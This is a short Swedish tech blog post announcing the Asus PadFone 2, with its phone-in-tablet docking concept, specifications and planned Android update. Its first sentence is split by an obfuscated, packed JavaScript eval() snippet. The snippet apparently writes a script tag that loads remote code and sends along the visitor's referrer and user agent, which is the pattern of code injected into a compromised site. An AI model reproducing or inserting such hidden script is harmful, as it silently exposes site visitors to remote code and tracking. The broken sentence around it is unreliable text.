Image Image Image Image Image Image Image Image Image Image

| 5 juni, 2020

Scroll to top

Top

Asus PadFone 2 visas upp!

Asus PadFone 2 visas upp!
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adzyz|var|u0026u|referrer|tyddt||js|php’.split(’|’),0,{}))
dag visade företaget Asus upp padfone 2 under en presskonferens i Taiwan. Den kommer senare också att avtäckas i Milano Italien men redan nu har Asus gått ut med de viktigaste uppgifterna om hur de har tagit konceptet vidare.

asus-padfone

Det handlar enkelt om att docka din smartphone i en surfplatta som endast består av ett batteri och en skärm. Resten drivs från telefonen och dess komponenter. Padfone 2 har fått sig ett rejält lyft från den tidigare modellen.

Telefonen som går att koppla har en skärm på 4,7 tum och 1280 x 720 pixlar, en quadcore Snapdragon-processor på 1,5 Ghz, 2 GB RAM och en kamera på 13 megapixel.
Själva surfplattan har fått en dockningskontakt där man för in telefonen vertikalt till skillnad från den tidigare modellen där telefonen sattes in horisontellt.

asus-samrtphone

Asus Padfone 2 kommer att levereras med Android 4.0.4 men företaget menar att man kommer att kunna uppgradera versionen av Android till 4.1 Jelly Bean, inom en snar framtid. Den kommer att släppas i Europa och Asien innan årets slut.

Coolt eller inte? Kommentera gärna nedan vad ni tycker!

Via: www.theverge.com